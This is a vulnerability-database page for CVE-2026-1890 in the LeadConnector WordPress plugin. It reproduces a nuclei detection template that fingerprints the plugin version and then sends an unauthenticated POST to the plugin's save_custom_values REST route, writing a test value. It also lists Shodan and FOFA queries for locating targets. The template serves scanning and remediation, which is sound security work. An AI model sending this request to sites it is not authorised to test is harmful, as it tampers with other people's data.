Lucene search
K

LeadConnector < 3.0.22 - Unauthenticated Arbitrary Data Write

🗓️ 03 Jul 2026 04:19:18Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 4 Views

LeadConnector plugin before 3.0.22 has an unauthenticated REST route that allows arbitrary data write.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-1890
26 Mar 202606:00
attackerkb
Circl
CVE-2026-1890
26 Mar 202609:06
circl
CNNVD
WordPress plugin LeadConnector 安全漏洞
26 Mar 202600:00
cnnvd
CVE
CVE-2026-1890
26 Mar 202606:00
cve
Cvelist
CVE-2026-1890 LeadConnector < 3.0.22 - Unauthenticated Rest Call
26 Mar 202606:00
cvelist
EUVD
EUVD-2026-16124
26 Mar 202609:30
euvd
NVD
CVE-2026-1890
26 Mar 202607:16
nvd
Patchstack
WordPress LeadConnector plugin < 3.0.22 - Unauthenticated Rest Call vulnerability
30 Mar 202612:47
patchstack
Positive Technologies
PT-2026-28216
26 Mar 202600:00
ptsecurity
VulnCheck KEV
VulnCheck KEV: CVE-2026-1890
30 Apr 202600:00
vulncheck_kev
Rows per page
id: CVE-2026-1890

info:
  name: LeadConnector < 3.0.22 - Unauthenticated Arbitrary Data Write
  author: 0x_Akoko
  severity: medium
  description: |
   LeadConnector WordPress plugin < 3.0.22 contains a broken access control caused by missing authorization in a REST route, letting unauthenticated attackers overwrite existing data remotely, exploit requires no authentication.
  impact: |
   Unauthenticated attackers can overwrite existing data, potentially leading to data tampering and loss of integrity.
  remediation: |
   Update to version 3.0.22 or later.
  reference:
    - https://wpscan.com/vulnerability/9b88be70-b5cc-4a3f-a871-64d61cb02076/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1890
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-1890
    epss-score: 0.00241
    epss-percentile: 0.15166
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 2
    vendor: leadconnector
    product: leadconnector
    fofa-query: body="/wp-content/plugins/leadconnector/"
    shodan-query: http.html:"leadconnector"
    tags: cve,cve2026,wordpress,wp-plugin,leadconnector,unauth,rest-api,intrusive,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/leadconnector/README.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "LeadConnector")'
          - 'compare_versions(lsversion, ">=1.0.0", "<=3.0.21")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: lsversion
        internal: true
        regex:
          - 'Stable tag: ([\d.]+)'
        group: 1

  - raw:
      - |
        POST /wp-json/lc_internal_api/v1/save_custom_values HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"custom_values":[{"fieldKey":"{{randstr}}","id":"1"}]}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "status", "success")'
        condition: and
# digest: 490a0046304402207ad59c087a3ef6bbae1a88384d21a4d23349b8834be580a954c8546df895367e022004f4497c2bfe25cfc6a1c86462d18a7f50140a97ff29018e1b28868882138d42:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Jul 2026 04:20Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.15.3
EPSS0.00241
SSVC
4